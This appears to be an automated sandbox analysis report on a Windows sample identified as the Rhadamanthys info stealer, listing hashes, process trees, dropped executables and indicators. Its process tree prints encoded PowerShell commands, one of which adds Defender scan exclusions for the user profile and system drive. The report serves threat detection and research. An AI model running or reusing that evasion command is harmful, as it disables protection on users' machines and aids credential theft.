Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-04-2024 01:05
Static task
static1
Behavioral task
behavioral1
Sample
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
Resource
win10v2004-20240226-en
General
-
Target
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
-
Size
597KB
-
MD5
d6abeeea631ceedc9704b11198ddb305
-
SHA1
32c3d810eef2eefa3e317001657f6e5beb839080
-
SHA256
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72
-
SHA512
b648a43f3fd6bf9c5594b8d0fa882eacd5714d2b69d295ef8c749ef5cae81846ed148034cc9cbc46912fdc959d83f4d9e9f822552f5ddba5a45c1d4e4150d876
-
SSDEEP
12288:pjImsaOOmzPgf/zaUR58rAfTFIg4biQN9Az+I:pjqOmzIDaG58UfTFwnP
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 2548 created 1216 2548 svchost.exe Explorer.EXE -
Executes dropped EXE 2 IoCs
Processes:
XWormLoader.exesvchost.exepid process 2648 XWormLoader.exe 2548 svchost.exe -
Loads dropped DLL 8 IoCs
Processes:
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exeWerFault.exepid process 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2496 2648 WerFault.exe XWormLoader.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exesvchost.exedialer.exepid process 2112 powershell.exe 2972 powershell.exe 2548 svchost.exe 2548 svchost.exe 2748 dialer.exe 2748 dialer.exe 2748 dialer.exe 2748 dialer.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2112 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exeXWormLoader.exesvchost.exedescription pid process target process PID 2360 wrote to memory of 2972 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 2360 wrote to memory of 2972 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 2360 wrote to memory of 2972 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 2360 wrote to memory of 2972 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 2360 wrote to memory of 2112 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 2360 wrote to memory of 2112 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 2360 wrote to memory of 2112 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 2360 wrote to memory of 2112 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 2360 wrote to memory of 2648 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe XWormLoader.exe PID 2360 wrote to memory of 2648 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe XWormLoader.exe PID 2360 wrote to memory of 2648 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe XWormLoader.exe PID 2360 wrote to memory of 2648 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe XWormLoader.exe PID 2360 wrote to memory of 2548 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe svchost.exe PID 2360 wrote to memory of 2548 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe svchost.exe PID 2360 wrote to memory of 2548 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe svchost.exe PID 2360 wrote to memory of 2548 2360 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe svchost.exe PID 2648 wrote to memory of 2496 2648 XWormLoader.exe WerFault.exe PID 2648 wrote to memory of 2496 2648 XWormLoader.exe WerFault.exe PID 2648 wrote to memory of 2496 2648 XWormLoader.exe WerFault.exe PID 2648 wrote to memory of 2496 2648 XWormLoader.exe WerFault.exe PID 2548 wrote to memory of 2748 2548 svchost.exe dialer.exe PID 2548 wrote to memory of 2748 2548 svchost.exe dialer.exe PID 2548 wrote to memory of 2748 2548 svchost.exe dialer.exe PID 2548 wrote to memory of 2748 2548 svchost.exe dialer.exe PID 2548 wrote to memory of 2748 2548 svchost.exe dialer.exe PID 2548 wrote to memory of 2748 2548 svchost.exe dialer.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe"C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAaQBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAZgBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABsAGkAYwBlAG4AcwBlACAAaABhAHMAIABlAHgAcABpAHIAZQBkAC4AIABDAG8AbgB0AGEAYwB0ACAAdQBzACAAdgBpAGEAIAB0AGUAbABlAGcAcgBhAG0AIAB0AG8AIABwAHUAcgBjAGgAYQBzAGUAIAAvACAAZwBlAHQAIABmAHIAZQBlACAAdAByAGkAYQBsACAAdgBlAHIAcwBpAG8AbgAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBjAG4AaQAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcgBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcABnACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 5724⤵
- Loads dropped DLL
- Program crash
PID:2496
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2548
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2748
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\147PLU7VQRBKJ61YDX6Z.temp
Filesize7KB
MD5765f2824d7b355aaefc7edb3c36c7deb
SHA1744b78dbbb95dc7ddb7a4453004d826d0216b017
SHA256d0fc284651c5d8c026105f058495b34b90b3c11e988939918a1270482c0464cd
SHA512e26b5cf22172a27821a2fcc86fa12a4c434477c426376ebc0c345eb1ab6037a719481ef9767bc24a84e6ea0e5b81d2c6d0890b79c27033a5f138020b7f085233
-
Filesize
101KB
MD539d81ca537ceb52632fbb2e975c3ee2f
SHA10a3814bd3ccea28b144983daab277d72313524e4
SHA25676c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA51218f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a
-
Filesize
355KB
MD52ef91bf37b3da8cad6751b665bd4e6af
SHA15c15bbc721f91855388861d378cf9d26a140cead
SHA2565263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA51216f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3